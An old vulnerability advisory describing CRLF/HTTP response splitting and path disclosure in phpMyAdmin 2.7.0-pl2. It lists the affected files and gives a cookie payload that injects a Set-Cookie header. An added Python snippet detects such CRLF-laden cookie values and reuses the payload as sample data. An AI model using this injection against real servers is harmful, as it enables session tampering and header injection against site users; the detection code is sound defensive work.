phpMyAdmin 2.7.0-pl2 Path Disclosure | Multiple CRLF/HTTP Response Splitting
*************************************************************************************
# Title : phpMyAdmin 2.7.0-pl2 Path Disclosure | Multiple CRLF/HTTP Response Splitting Vulnerability
# Author : ajann
# Contact : :(
# Tested : Just 2.7.0-pl2
*************************************************************************************
[[CRLF]]]------------------------------------------------------
Files----
/css/phpmyadmin.css.php
/db_create.php
/index.php
/left.php
/libraries/session.inc.php
/libraries/transformations/overview.php
/querywindow.php
/server_engines.php
/...
/..
/Files----
Cookie:
->Open Cookie Editor
->Find the phpMyAdmin value
->Set it to:
phpMyAdmin=%0d%0aSet-Cookie%3Asome%3Dvalue
New Cookie => some=value
.....
..
[[/CRLF]]]
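
Added example (not part of the original advisory and not phpMyAdmin code): a Python check that flags Cookie headers whose values decode to CR or LF, as the phpMyAdmin value above does, plus an allowlist test to apply before a cookie value is copied into a response header. The allowlist pattern, the decode-round limit, the `lang` cookie and the sample headers are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Assumed shape of a session identifier (example only, not phpMyAdmin's rule).
SAFE_VALUE = re.compile(r"[A-Za-z0-9,-]{1,128}")
MAX_DECODE_ROUNDS = 3  # assumed limit; catches double/triple percent-encoding


def fully_decode(value, rounds=MAX_DECODE_ROUNDS):
    """Percent-decode repeatedly until the value stops changing."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_cookie_header(header):
    """Split a raw Cookie header into (name, raw_value) pairs."""
    pairs = []
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            pairs.append((name, value))
    return pairs


def find_crlf_cookies(header):
    """Return the names of cookies whose decoded value contains CR or LF."""
    return [name for name, value in parse_cookie_header(header)
            if re.search(r"[\r\n]", fully_decode(value))]


def is_safe_session_value(value):
    """Allowlist check to run before a cookie value is echoed into a header.

    fullmatch is used on purpose: with match() and '$', a trailing newline
    would still be accepted.
    """
    return SAFE_VALUE.fullmatch(fully_decode(value)) is not None


# Constructed sample headers; the second carries the value from the advisory.
SAMPLES = [
    "phpMyAdmin=3f2a9c1b7d; lang=en",
    "phpMyAdmin=%0d%0aSet-Cookie%3Asome%3Dvalue",
    "lang=en; phpMyAdmin=abc%250d%250aX-Test%3A1",
]

if __name__ == "__main__":
    for header in SAMPLES:
        print(find_crlf_cookies(header), "<-", header)
```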
[[PATH]]]------------------------------------------------------
File----
//libraries/common.lib.php
/File----
[[/PATH]]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# I'm not a hacker!